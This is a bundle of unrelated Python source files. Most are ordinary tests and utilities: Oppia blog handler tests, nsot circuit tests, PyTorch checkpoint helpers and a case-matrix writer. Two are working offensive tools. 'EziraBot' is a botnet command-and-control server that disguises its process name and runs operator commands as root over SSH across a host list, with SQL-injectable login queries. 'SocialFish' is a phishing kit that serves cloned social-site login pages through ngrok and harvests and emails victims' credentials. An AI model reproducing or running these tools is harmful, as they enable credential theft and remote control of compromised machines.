blog_services.update_blog_post(blog_post.id, change_dict)
blog_services.publish_blog_post(blog_post.id)
json_response = self.get_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL))
self.assertEqual(self.BLOG_EDITOR_USERNAME, json_response['username'])
self.assertEqual(
blog_post.id,
json_response['published_blog_post_summary_dicts'][0]['id'])
self.assertEqual(
change_dict['title'],
json_response['published_blog_post_summary_dicts'][0]['title'])
self.assertEqual(json_response['draft_blog_post_summary_dicts'], [])
def test_create_new_blog_post(self):
# Checks blog editor can create a new blog post.
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
json_response = self.post_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL), {}, csrf_token=csrf_token)
blog_post_id = json_response['blog_post_id']
blog_post_rights = blog_services.get_blog_post_rights(blog_post_id)
self.assertEqual(blog_post_rights.editor_ids, [self.blog_editor_id])
self.logout()
# Checks non blog-admins and non editors cannot create a new blog post.
self.login(self.user_email)
json_response = self.post_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL), {},
csrf_token=csrf_token, expected_status_int=401)
self.logout()
class BlogPostHandlerTests(test_utils.GenericTestBase):
username = 'user'
user_email = '[email protected]'
def setUp(self):
"""Completes the sign-up process for the various users."""
super(BlogPostHandlerTests, self).setUp()
self.signup(
self.BLOG_ADMIN_EMAIL, self.BLOG_ADMIN_USERNAME)
self.signup(
self.BLOG_EDITOR_EMAIL, self.BLOG_EDITOR_USERNAME)
self.signup(self.user_email, self.username)
self.add_user_role(
self.BLOG_ADMIN_USERNAME, feconf.ROLE_ID_BLOG_ADMIN)
self.add_user_role(
self.BLOG_EDITOR_USERNAME,
feconf.ROLE_ID_BLOG_POST_EDITOR)
self.blog_admin_id = (
self.get_user_id_from_email(self.BLOG_ADMIN_EMAIL))
self.blog_editor_id = (
self.get_user_id_from_email(self.BLOG_EDITOR_EMAIL))
self.blog_post = (
blog_services.create_new_blog_post(self.blog_editor_id))
def test_get_blog_post_editor_page_data(self):
# Checks blog editor can access blog post editor.
self.login(self.BLOG_EDITOR_EMAIL)
json_response = self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
)
self.assertEqual(self.BLOG_EDITOR_USERNAME, json_response['username'])
expected_blog_post_dict = {
'id': u'%s' % self.blog_post.id,
'title': '',
'content': '',
'tags': [],
'thumbnail_filename': None,
'url_fragment': '',
'published_on': None,
'last_updated': u'%s' % utils.convert_naive_datetime_to_string(
self.blog_post.last_updated)
}
self.assertEqual(
expected_blog_post_dict, json_response['blog_post_dict'])
self.assertEqual(10, json_response['max_no_of_tags'])
self.logout()
# Checks blog admin can access blog post editor for a given blog post.
self.login(self.BLOG_ADMIN_EMAIL)
json_response = self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
)
self.assertEqual(self.BLOG_EDITOR_USERNAME, json_response['username'])
expected_blog_post_dict = {
'id': u'%s' % self.blog_post.id,
'title': '',
'content': '',
'tags': [],
'thumbnail_filename': None,
'url_fragment': '',
'published_on': None,
'last_updated': u'%s' % utils.convert_naive_datetime_to_string(
self.blog_post.last_updated)
}
self.assertEqual(
expected_blog_post_dict, json_response['blog_post_dict'])
self.assertEqual(10, json_response['max_no_of_tags'])
self.logout()
# Checks non blog-admins and non-editors can not access blog editor.
self.login(self.user_email)
json_response = self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=401)
self.logout()
self.set_curriculum_admins([self.username])
self.login(self.user_email)
json_response = self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=401)
self.logout()
def test_get_blog_post_data_by_invalid_blog_post_id(self):
self.login(self.BLOG_EDITOR_EMAIL)
self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, '123'),
expected_status_int=500)
blog_services.delete_blog_post(self.blog_post.id)
self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=404)
self.logout()
def test_put_blog_post_data(self):
# Checks blog editor can edit owned blog post.
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'change_dict': {
'title': 'Sample Title',
'content': '<p>Hello<p>',
'tags': ['New lessons', 'Learners'],
'thumbnail_filename': 'file.svg'
},
'new_publish_status': False
}
json_response = self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload, csrf_token=csrf_token)
self.assertEqual(
json_response['blog_post']['title'], 'Sample Title')
blog_post = (
blog_services.get_blog_post_by_id(self.blog_post.id))
self.assertEqual(
blog_post.thumbnail_filename, 'file.svg')
self.logout()
def test_put_blog_post_data_by_invalid_blog_post_id(self):
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'change_dict': {
'title': 'Sample Title',
},
'new_publish_status': False
}
self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, 123),
payload, csrf_token=csrf_token,
expected_status_int=404)
blog_services.delete_blog_post(self.blog_post.id)
csrf_token = self.get_new_csrf_token()
# This is raised by acl decorator.
self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload, csrf_token=csrf_token, expected_status_int=404)
def test_update_blog_post_with_invalid_change_dict(self):
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'change_dict': {
'title': 1234,
},
'new_publish_status': False
}
response = self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Schema validation for \'change_dict\''
' failed: Title should be a string.')
def test_publishing_unpublishing_blog_post(self):
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'change_dict': {
'title': 'Sample Title',
'content': '<p>Hello<p>',
'tags': ['New lessons', 'Learners'],
'thumbnail_filename': 'file.svg'
},
'new_publish_status': True
}
self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload, csrf_token=csrf_token)
blog_post_rights = blog_services.get_blog_post_rights(self.blog_post.id)
self.assertTrue(blog_post_rights.blog_post_is_published)
# Unpublishing blog post.
csrf_token = self.get_new_csrf_token()
payload = {
'change_dict': {},
'new_publish_status': False
}
self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload, csrf_token=csrf_token)
blog_post_rights = blog_services.get_blog_post_rights(self.blog_post.id)
self.assertFalse(blog_post_rights.blog_post_is_published)
def test_uploading_thumbnail_with_valid_image(self):
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'thumbnail_filename': 'test_svg.svg'
}
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'), 'rb',
encoding=None) as f:
raw_image = f.read()
self.post_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload,
csrf_token=csrf_token,
upload_files=(('image', 'unused_filename', raw_image),),
expected_status_int=200)
self.logout()
def test_updating_blog_post_fails_with_invalid_image(self):
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'thumbnail_filename': 'cafe.flac'
}
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'cafe.flac'), 'rb',
encoding=None) as f:
raw_image = f.read()
json_response = self.post_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload,
csrf_token=csrf_token,
upload_files=(('image', 'unused_filename', raw_image),),
expected_status_int=400)
self.assertEqual(
json_response['error'], 'Image exceeds file size limit of 100 KB.')
def test_guest_can_not_delete_blog_post(self):
response = self.delete_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=401)
self.assertEqual(
response['error'],
'You must be logged in to access this resource.')
def test_cannot_delete_invalid_blog_post(self):
# Check that an invalid blog post can not be deleted.
# Error is raised by acl decorator.
self.login(self.BLOG_ADMIN_EMAIL)
self.delete_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, 123456),
expected_status_int=404)
self.logout()
self.login(self.BLOG_ADMIN_EMAIL)
# The error is raised by acl decorator as the blog post doesn't exist.
self.delete_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, 'abc123efgH34'),
expected_status_int=404)
self.logout()
def test_blog_post_handler_delete_by_admin(self):
# Check that blog admins can delete a blog post.
self.login(self.BLOG_ADMIN_EMAIL)
self.delete_json(
'%s/%s' % (
feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=200)
self.logout()
def test_blog_post_handler_delete_by_blog_editor(self):
# Check that editor who owns the blog post can delete it.
self.login(self.BLOG_EDITOR_EMAIL)
self.delete_json(
'%s/%s' % (
feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=200)
self.logout()
def test_cannot_delete_post_by_blog_editor(self):
# Check that blog editor who does not own the blog post can not
# delete it.
self.add_user_role(
self.username, feconf.ROLE_ID_BLOG_POST_EDITOR)
self.login(self.user_email)
self.delete_json(
'%s/%s' % (
feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=401)
self.logout()
|
py | 1a4a19ef74f984d92bf3d803a5bb0e297bf45207 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
from __future__ import absolute_import
import pytest
# Allow everything in there to access the DB
pytestmark = pytest.mark.django_db
from django.db import IntegrityError
from django.db.models import ProtectedError
from django.conf import settings
from django.core.exceptions import ValidationError as DjangoValidationError
import ipaddress
import logging
from nsot import exc, models
from .fixtures import admin_user, circuit, device, site, user, transactional_db
def test_creation(device):
"""Test basic Circuit creation."""
site = device.site
# Create a network for interface assignments
network = models.Network.objects.create(
cidr='10.32.0.0/24', site=site,
)
# A-side device/interface and child interface
device_a = device
iface_a = models.Interface.objects.create(
device=device_a, name='ae0', addresses=['10.32.0.1/32']
)
child_iface_a = models.Interface.objects.create(
device=device_a, name='ae0.0', addresses=['10.32.0.3/32'], parent=iface_a
)
# Z-side device/interface and child interface
device_z = models.Device.objects.create(
hostname='foo-bar2', site=site
)
iface_z = models.Interface.objects.create(
device=device_z, name='ae0', addresses=['10.32.0.2/32']
)
child_iface_z = models.Interface.objects.create(
device=device_z, name='ae0.0', addresses=['10.32.0.4/32'], parent=iface_z
)
# Create the circuits
circuit = models.Circuit.objects.create(
endpoint_a=iface_a, endpoint_z=iface_z
)
circuit_for_child_ifaces = models.Circuit.objects.create(
endpoint_a=child_iface_a, endpoint_z=child_iface_z
)
# Interface inherits endpoint_a's site
assert circuit.site == iface_a.site
# Name should be slugs of A/Z interfaces joined by '_'
expected_name_t = '{endpoint_a}_{endpoint_z}'
expected_name = expected_name_t.format(
endpoint_a=iface_a, endpoint_z=iface_z
)
assert circuit.name == expected_name
# Name slug should be the slugified version of the name
assert circuit.name_slug == expected_name.replace('/', '_')
# Assert property values
assert circuit.interfaces == [iface_a, iface_z]
assert [str(a) for a in circuit.addresses] == ['10.32.0.1/32', '10.32.0.3/32', \
'10.32.0.2/32', '10.32.0.4/32']
assert circuit.devices == [device_a, device_z]
# Try to create another circuit w/ the same interfaces (expecting Django
# validation error)
with pytest.raises(DjangoValidationError):
c2 = models.Circuit.objects.create(
endpoint_a=iface_a, endpoint_z=iface_z
)
# ... Or with A/Z sides swapped (expecting DRF validation error).
with pytest.raises(exc.ValidationError):
c2 = models.Circuit.objects.create(
endpoint_a=iface_z, endpoint_z=iface_a
)
def test_attributes(circuit):
"""Test that attributes work as expected."""
models.Attribute.objects.create(
site=circuit.site, resource_name='Circuit', name='cid'
)
models.Attribute.objects.create(
site=circuit.site, resource_name='Circuit', name='vendor'
)
# Set attributes
attrs = {'cid': 'abc123', 'vendor': 'acme'}
circuit.set_attributes(attrs)
assert circuit.get_attributes() == attrs
    # Test a simple set query just for kicks.
query_result = models.Circuit.objects.set_query('cid=abc123 vendor=acme')
assert list(query_result) == [circuit]
# Verify that we can zero out attributes
circuit.set_attributes({})
assert circuit.get_attributes() == {}
# And make sure no bogus attributes can be set.
with pytest.raises(exc.ValidationError):
circuit.set_attributes(None)
with pytest.raises(exc.ValidationError):
circuit.set_attributes({0: 'value'})
with pytest.raises(exc.ValidationError):
circuit.set_attributes({'key': 0})
with pytest.raises(exc.ValidationError):
circuit.set_attributes({'made_up': 'value'})
class TestInterfaceFor(object):
@pytest.fixture
def device_z(self, site):
return models.Device.objects.create(site=site, hostname='foo-bar2')
@pytest.fixture
def interface_a(self, device):
return models.Interface.objects.create(device=device, name='eth0')
@pytest.fixture
def interface_z(self, device_z):
return models.Interface.objects.create(
device=device_z, name='eth0')
@pytest.fixture
def normal_circuit(self, device_z, interface_a, interface_z):
return models.Circuit.objects.create(
endpoint_a=interface_a,
endpoint_z=interface_z
)
@pytest.fixture
def looped_circuit(self, device, interface_a):
interface_z = models.Interface.objects.create(
device=device,
name='eth1'
)
return models.Circuit.objects.create(
endpoint_a=interface_a,
endpoint_z=interface_z,
)
def test_normal_conditions(self, device, device_z, interface_a,
interface_z, normal_circuit):
assert normal_circuit.interface_for(device) == interface_a
print('interface_z via circuit id = {}'.format(normal_circuit.endpoint_z.id))
print('interface_z id = {}'.format(interface_z.id))
assert normal_circuit.interface_for(device_z) == interface_z
def test_single_sided(self, device, interface_a):
"""
Make sure things don't blow up on a single-sided circuit
"""
circuit = models.Circuit.objects.create(endpoint_a=interface_a)
assert circuit.interface_for(device) == interface_a
def test_looped_circuit(self, device, looped_circuit, interface_a):
"""
Test the case when both sides of a circuit are connected to the same
device. The method should return endpoint_a in this case.
"""
assert looped_circuit.interface_for(device) == interface_a
def test_bogus_device(self, device, device_z, looped_circuit):
"""
interface_for should return None when given a device that isn't
connected by the circuit
"""
assert looped_circuit.interface_for(device_z) is None
assert looped_circuit.interface_for(device) is not None
|
py | 1a4a1a131cd3946c590b81c527b26b2aaddffb02 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Misc Libs
import time
import random
from datetime import datetime
# Character Libs
import string
import hashlib
import binascii
# System Libs
import os
import sys
import itertools
import subprocess
import ctypes
import threading
# Network Libs
from pssh.pssh2_client import ParallelSSHClient
import socket
import MySQLdb
import requests
class puts:
@staticmethod
def run(cmd):
subprocess.call(cmd, shell=True)
@staticmethod
def err(string):
sys.stderr.write(string + "\n")
@staticmethod
def out(string):
sys.stdout.write(string + "\n")
# Variables
max_threads = 50
states = ['telnet', 'ntpq', 'ntpdc', 'apache2']
thread_ids = []
syntax_prefix = "/"
tcp_allow = True
__tcpname__ = "\033[46m\033[30m[ezira_tcp]\033[0m"
__obfname__ = "\033[101m\033[30m[ezira_obf]\033[0m"
__cltname__ = "\033[45m\033[30m[ezira_client]\033[0m"
__sysname__ = "\033[100m\033[30m[ezira_sys]\033[0m"
__tskname__ = "\033[104m\033[30m[ezira_task]\033[0m"
def check_for_package():
global states
select_pack = (random.choice(states))
result = os.path.isfile("/usr/bin/%s" % (select_pack))
if (result):
puts.out(__obfname__ + " package: %s found. using as spoofed process name." % (select_pack))
processname = select_pack
libc = ctypes.cdll.LoadLibrary('libc.so.6')
libc.prctl(15, processname, 0, 0, 0)
Server()
elif (not result):
puts.out(__obfname__ + " package: %s is not installed. attempting new package." % (select_pack))
check_for_package()
def GetClientThread():
char = ''.join(random.choice(string.digits) for x in range(6))
fin_char = "0x" + char
return fin_char
def GetBanner(conn):
clist = ["\033[31m", "\033[32m", "\033[33m", "\033[34m", "\033[35m"]
is_banner_a_file = os.path.isfile("/var/log/ezira/banner.txt")
if (is_banner_a_file == True):
file = open("/var/log/ezira/banner.txt")
for line in file:
dcol = random.choice(clist)
line = line.strip("\r\n")
conn.send(dcol + line + "\r\n")
elif (is_banner_a_file == False):
pass
def client(gct, conn, addr):
conn.send("\033]0;EziraBot\007")
global thread_ids
global usernames_active
global devices_av
global install
admin = False
banned = False
premium = False
isValidAccount = False
isSession1 = False
hosts = []
db = MySQLdb.connect(host="localhost", user="root", passwd="", db="ezira")
cur = db.cursor()
try:
file = open("/var/log/ezira/ssh_servers.txt", "r")
for line in file:
hosts.append(line.strip("\r\n"))
conn.send("executing 'login' from task: mmaster_cnc_scmd\r\n")
puts.out(__cltname__ + " prompting client with login")
conn.send("\033[1m\033[30m\033[107mlogin:\033[0m ")
username = conn.recv(1024).strip("\r\n")
conn.send("\033[1m\033[30m\033[107mpassword:\033[0m ")
password = conn.recv(1024).strip("\r\n")
puts.out(__cltname__ + " client sent login [%s:%s]" % (username, password))
cur.execute("SELECT * FROM `users` WHERE username=\"%s\" AND password=\"%s\"" % (username, password))
row = cur.fetchall()
if (row):
isValidAccount = True
if (row[0][3] == 1):
admin = True
if (row[0][4] == 1):
banned = True
if (row[0][5] == 1):
premium = True
if (row[0][6] == 1):
isSession1 = True
elif (not row):
isValidAccount = False
if (isValidAccount == True and banned == False and isSession1 == False):
conn.send("\033]0;EziraBot | Username - %s | Administrator - %s | Conns - %s\007" % (username, admin, len(hosts)))
cur.execute("UPDATE `users` SET session=1 WHERE username=\"%s\" AND password=\"%s\"" % (username, password))
conn.send("\033[2J\033[1;1H")
GetBanner(conn)
try:
while True:
conn.send("\033[0m%s@ezira $ " % (username))
try:
oCmd = conn.recv(512)
blank = conn.recv(512)
nCmd = oCmd.split(' ')
elif (nCmd[0] == syntax_prefix+"threads"):
conn.send("[%d/%d] threads used\r\n" % (len(thread_ids), max_threads))
elif (nCmd[0] == syntax_prefix+"logout"):
conn.close()
cur.execute("UPDATE `users` SET session=0 WHERE username=\"%s\" AND password=\"%s\"" % (username, password))
elif (nCmd[0] == syntax_prefix+"clear"):
conn.send("\033[2J\033[1;1H")
elif (nCmd[0] == syntax_prefix+"net_info"):
try:
if (nCmd[1] == "ip-domain"):
host = nCmd[2]
result = socket.gethostbyname(str(host))
conn.send(result + "\r\n")
elif (nCmd[1] == "getfqdn"):
host = nCmd[2]
result = socket.getfqdn(str(host))
conn.send(result + "\r\n")
except socket.gaierror as e:
conn.send(__tskname__ + " task '%s': failed to resolve hostname '%s'\r\n" % (nCmd[0],host))
elif (nCmd[0] == syntax_prefix+"adduser"):
if (admin):
cur.execute("INSERT INTO `users` VALUES (NULL, \"%s\", \"%s\", 0, 0, 0, 0)" % (nCmd[1], nCmd[2]))
elif (not admin):
conn.send(__tskname__ + " task '%s': failed to execute | user not administrator\r\n" % (nCmd[0]))
elif (nCmd[0] == syntax_prefix+"banuser"):
if (admin):
cur.execute("UPDATE `users` SET banned=1 WHERE username=\"%s\"" % (nCmd[1]))
elif (not admin):
conn.send(__tskname__ + " task '%s': failed to execute | user not administrator\r\n" % (nCmd[0]))
elif (nCmd[0] == syntax_prefix+"shutdown"):
if (admin):
sys.exit("[ezira_sys] shutting down... (0)")
elif (not admin):
conn.send(__tskname__ + " task '%s': failed to execute | user not administrator\r\n" % (nCmd[0]))
elif (nCmd[0] == syntax_prefix+"exec"):
if (nCmd[1] == "sys"):
conn.send("command: ")
cmdInput = conn.recv(1024)
conn.send("executing 'sys' to hosts...\r\n")
ssh_h_client = ParallelSSHClient(hosts, user="root", password="SET_PASSWORD", port=22, timeout=10)
output = ssh_h_client.run_command(cmdInput)
for host in output:
puts.out(__tskname__ + " task '%s': executed on %s | exit code: '%s'" % (nCmd[1], host, output[host].exit_code))
elif (nCmd[0] == syntax_prefix+"enable"):
if (nCmd[1] == "telnet"):
if (nCmd[2] == "honeypot"):
pass
elif (nCmd[1] == "ssh"):
if (nCmd[2] == "honeypot"):
pass
except Exception as e:
conn.send("Invalid Syntax\r\n")
puts.out(str(e))
except Exception:
puts.out(__cltname__ + " user {}:{} has disconnected with id {}".format(addr[0], addr[1], gct))
cur.execute("UPDATE `users` SET session=0 WHERE username=\"%s\" AND password=\"%s\"" % (username, password))
thread_ids.remove(gct)
if (conn):
conn.close()
elif (isValidAccount == False):
puts.out(__cltname__ + " %s:%s tried logging in with a non-existant account %s:%s" % (addr[0], addr[1], username, password))
thread_ids.remove(gct)
raise Exception
elif (isSession1 == True):
puts.out(__cltname__ + " user has tried logging in twice, killing connection. [%s:%s - %s:%s]" % (addr[0], addr[1], username, password))
thread_ids.remove(gct)
raise Exception
elif (isValidAccount == True and banned == True):
puts.out(__cltname__ + " %s:%s tried logging into a banned account %s:%s" % (addr[0], addr[1], username, password))
thread_ids.remove(gct)
raise Exception
except Exception as e:
puts.out(__cltname__ + " user {}:{} has disconnected with id {}".format(addr[0], addr[1], gct))
cur.execute("UPDATE `users` SET session=0 WHERE username=\"%s\" AND password=\"%s\"" % (username, password))
try:
thread_ids.remove(gct)
except ValueError:
pass
if (conn):
conn.close()
def Server():
sock = socket.socket()
try:
sock.bind(("0.0.0.0", int(sys.argv[1])))
except socket.error:
puts.err(__tcpname__ + " address already in use")
puts.out(__tcpname__ + " socket is now listening on %d" % (int(sys.argv[1])))
sock.listen(0)
puts.out("------------------------------------")
try:
if (tcp_allow):
while True:
conn, addr = sock.accept()
puts.out(__tcpname__ + " new connection from {}:{}".format(addr[0], addr[1]))
gct = GetClientThread()
thread_ids.append(gct)
puts.out(__tcpname__ + " client assigned thread {}".format(gct))
try:
if (len(thread_ids) != max_threads):
gct_run = threading.Thread(target=client, args=(gct, conn, addr,)).start()
else:
puts.out(__tcpname__ + "max threads used. disconnecting client.")
except threading.ThreadError:
puts.out(__tcpname__ + " failed to start thread with id {}".format(gct))
except:
puts.out(__tcpname__ + " unknown thread error returning id {}".format(gct))
elif (not tcp_allow):
sys.exit(__tcpname__ + " tcp_allow var set to False")
except socket.error as e:
puts.out(__tcpname__ + " unexpected error.")
puts.out(str(e))
Server()
|
py | 1a4a1aeef0ee818a0838313146ab0fcc394d0b36 | from IpToCountry.ip_to_country import IpToCountry
class Test_IpToCountry:
def testParser(self):
ip_to_country = IpToCountry()
assert \
ip_to_country._config['api']['url'] ==\
'http://api.ipstack.com/'
assert \
ip_to_country._config['api']['key'] ==\
'API_KEY'
assert \
ip_to_country._config['local']['database_file'] ==\
r'..\resources\test_db'
|
py | 1a4a1b422f18777ca3ee09ca0d3fee02036068ed | # -*- coding: utf-8 -*-
#
# Developed by Alex Jercan <[email protected]>
#
# References:
#
import os
import torch
def tensors_to_device(tensors, device):
return (tensor.to(device, non_blocking=True) for tensor in tensors)
def init_weights(m):
if type(m) == torch.nn.Conv2d or type(m) == torch.nn.Conv3d or \
type(m) == torch.nn.ConvTranspose2d or type(m) == torch.nn.ConvTranspose3d:
torch.nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
elif type(m) == torch.nn.BatchNorm2d or type(m) == torch.nn.BatchNorm3d:
torch.nn.init.constant_(m.weight, 1)
torch.nn.init.constant_(m.bias, 0)
elif type(m) == torch.nn.Linear:
torch.nn.init.normal_(m.weight, 0, 0.01)
torch.nn.init.constant_(m.bias, 0)
def set_parameter_requires_grad(model):
for param in model.parameters():
param.requires_grad = False
def load_checkpoint(model, checkpoint_file, device):
checkpoint = torch.load(checkpoint_file, map_location=device)
init_epoch = checkpoint['epoch_idx'] + 1
model.load_state_dict(checkpoint['state_dict'])
return init_epoch, model
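# A minimal resume-training sketch (hypothetical model and paths, not part of the original module):
#
#   device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
#   model = MyModel().to(device)                 # assumed user-defined model
#   init_epoch, model = load_checkpoint(model, 'checkpoints/checkpoint-epoch-010.pth', device)
#   # ...train from init_epoch onward, calling save_checkpoint(epoch_idx, model, 'checkpoints')
#   # (defined below) at the end of each epoch.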
def save_checkpoint(epoch_idx, model, dir_checkpoints):
file_name = 'checkpoint-epoch-%03d.pth' % (epoch_idx)
output_path = os.path.join(dir_checkpoints, file_name)
if not os.path.exists(dir_checkpoints):
os.makedirs(dir_checkpoints)
checkpoint = {
'epoch_idx': epoch_idx,
'state_dict': model.state_dict(),
}
torch.save(checkpoint, output_path) |
py | 1a4a1c560fb07b47d45ba82629b0a971689a27bd | ######################################################
# #
# SOCIALFISH v2.0 #
# #
# by: vaon4ik #
# #
# Telegram Group: https://t.me/joinchat/PMg-a1UcFlsyE___0SuKiQ #
#
# #
# #
######################################################
from contextlib import contextmanager
import json
import multiprocessing
import requests
import os
from time import sleep
from huepy import *
import subprocess
from core.email import send_mail
from core.credentials import credentials
from smtplib import SMTPSenderRefused, SMTPServerDisconnected
from time import strftime
def runPhishing(social, custom):
global _social
_social = social
os.system('rm -Rf base/Server/www/*.* && touch base/Server/www/cat.txt')
command = 'cp base/WebPages/%s/*.* base/Server/www/' % social.lower()
os.system(command)
with open('base/Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUST0M>', custom)
f = open('base/Server/www/login.php', 'w')
f.write(c)
f.close()
def waitCreds():
print(cyan(" [*] Waiting for credentials... "))
while True:
with open('base/Server/www/cat.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
print(green('\n [*] Credentials found:\n %s' % lines))
os.system('rm -rf base/Server/www/cat.txt && touch base/Server/www/cat.txt')
try:
credentials(lines.split('\n'), _social)
send_mail(lines.split('\n'),_social)
except NameError:
pass
except SMTPSenderRefused:
print(red(' [!] Sorry, sender refused :('))
pass
except SMTPServerDisconnected:
pass
@contextmanager
def runServer(port: int):
def php_process():
os.system("cd base/Server/www/ && php -n -S 127.0.0.1:%d > /dev/null 2>&1 &" % port)
php_process = multiprocessing.Process(target=php_process)
php_process.start()
yield php_process
php_process.terminate()
php_process.close()
@contextmanager
def ngrok_start(port: int):
ngrok_process = subprocess.Popen(
['./base/Server/ngrok','http','%s' % port],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
while True:
try:
ngrok_url = requests.get('http://127.0.0.1:4040/api/tunnels/command_line')
if ngrok_url.status_code == 200:
public_url = json.loads(ngrok_url.text)['public_url']
print(green(' [~] Ready to Phishing'))
print(lightgreen(' [*] Ngrok URL: %s' % public_url))
print(green(' [~] Your logs are being stored in: Logs/{}').format(_social + strftime('-%y%m%d.txt')))
print(yellow(' [^] Press Ctrl+C or VolDown+C(android) to quit'))
yield public_url
break
except requests.exceptions.ConnectionError:
sleep(.5)
os.kill(ngrok_process.pid, 15)
def PhishingServer(port: int=1449):
with ngrok_start(port) as ngrok:
with runServer(port) as php:
waitCreds()
|
py | 1a4a1d5376e4385ddc8c3f25298434ed86244ec6 | import os, itertools
import numpy as np
from ofTools.util.FileTools import save_yaml
def save_case_matrix_direct(case_list, dir_matrix):
### assumes all elements of the list are dict for that case that has the same keys!
if not os.path.exists(dir_matrix):
os.makedirs(dir_matrix)
ofh = open(os.path.join(dir_matrix,'case_matrix.txt'),'w')
case = case_list[0]
for key in case.keys():
k = key[0]
ofh.write("%s " % k)
ofh.write("\n")
for key in case.keys():
k = key[1]
ofh.write("%s " % k)
ofh.write("\n")
for i in range(len(case_list)):
case = case_list[i]
for key in case.keys():
ofh.write(str(case[key]))
ofh.write(" ")
ofh.write("\n")
ofh.close()
def save_case_matrix(matrix_out, change_vars, dir_matrix):
# save matrix file
if type(change_vars[0]) is tuple:
n_header_lines = len(change_vars[0])
else:
change_vars = [(var,) for var in change_vars]
n_header_lines = 1
n_cases = np.shape(matrix_out)[0]
matrix_out = np.hstack((np.asarray([[i] for i in range(n_cases)]), matrix_out))
change_vars = [('Case_ID',)+('',)*(n_header_lines-1)] + change_vars
# col_len = [max([len(val) for val in matrix_out[:,j]] + [len(change_vars[j][0]), len(change_vars[j][1])]) for j in range(len(change_vars))]
col_len = [max([len(str(val)) for val in matrix_out[:,j]] + [len(change_vars[j][header_i]) for header_i in range(n_header_lines)]) for j in range(len(change_vars))]
text_out = []
for header_i in range(n_header_lines):
text_out.append(''.join([val.center(col+2) for val, col in zip([var[header_i] for var in change_vars], col_len)])+'\n')
for row in matrix_out:
row_str = ''
for val, col in zip(row, col_len):
if val is not str:
val = str(val)
row_str += val.center(col+2)
row_str += '\n'
text_out.append(row_str)
if not os.path.exists(dir_matrix):
os.makedirs(dir_matrix)
ofh = open(os.path.join(dir_matrix,'case_matrix.txt'),'w')
for row in text_out:
ofh.write(row)
ofh.close()
def save_case_matrix_yaml(matrix_out, change_vars, dir_matrix, case_names):
matrix_out_yaml = {}
for var in change_vars:
matrix_out_yaml[var] = []
matrix_out_yaml['Case_ID'] = []
matrix_out_yaml['Case_Name'] = []
for i, row in enumerate(matrix_out):
matrix_out_yaml['Case_ID'].append(i)
matrix_out_yaml['Case_Name'].append(case_names[i])
for val, var in zip(row, change_vars):
if type(val) is list:
if len(val) == 1:
val = val[0]
if type(val) in [np.float32, np.float64, np.single, np.double, np.longdouble]:
val = float(val)
elif type(val) in [np.int8, np.int16, np.int32, np.int64, np.uint8, np.uint16, np.uint32, np.uint64, np.intc, np.uintc, np.uint]:
val = int(val)
elif type(val) in [np.array, np.ndarray]:
val = val.tolist()
elif type(val) in [np.str_]:
val = str(val)
# elif len(val) > 0:
# val = val.tolist()
matrix_out_yaml[var].append(val)
if not os.path.exists(dir_matrix):
os.makedirs(dir_matrix)
save_yaml(dir_matrix, 'case_matrix.yaml', matrix_out_yaml)
def case_naming(n_cases, namebase=None):
# case naming
case_name = [('%d'%i).zfill(len('%d'%(n_cases-1))) for i in range(n_cases)]
if namebase:
case_name = [namebase+'_'+caseid for caseid in case_name]
return case_name
